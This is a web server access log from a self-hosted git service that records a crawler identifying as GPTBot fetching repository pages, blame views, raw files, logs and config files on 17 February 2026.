"/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" +[17/Feb/2026:14:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10938] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10937] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10891] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27642] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:14:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10938] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html?display=rendered" [Client 74.7.227.38] [Length 14720] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:14:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" [Client 74.7.227.38] [Length 10503] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:14:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" +[17/Feb/2026:14:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11297] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:14:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 10980] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" +[17/Feb/2026:14:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11882] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:14:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14325] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15930] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32571] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16937] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14688] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:14:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10194] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" +[17/Feb/2026:14:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10376] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" +[17/Feb/2026:14:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" +[17/Feb/2026:14:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" +[17/Feb/2026:14:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11208] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" +[17/Feb/2026:14:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/daily" [Client 74.7.227.38] [Length 8384] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:14:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/daily" [Client 74.7.227.38] [Length 8584] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:14:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9505] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11448] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9506] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14640] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11475] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/monthly" [Client 74.7.227.38] [Length 8600] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:14:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 288808] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" +[17/Feb/2026:14:07:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:14:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:14:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14912] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:14:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14917] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:14:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot.atom" [Client 74.7.227.38] [Length 8270] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" +[17/Feb/2026:14:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10869] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" +[17/Feb/2026:14:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27610] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:14:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27641] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:14:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:14:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects" [Client 74.7.227.38] [Length 7771] [Gzip 2.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12333] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" +[17/Feb/2026:14:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" +[17/Feb/2026:14:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" +[17/Feb/2026:14:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15261] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" +[17/Feb/2026:14:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" +[17/Feb/2026:14:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" +[17/Feb/2026:14:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15259] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" +[17/Feb/2026:14:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32569] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 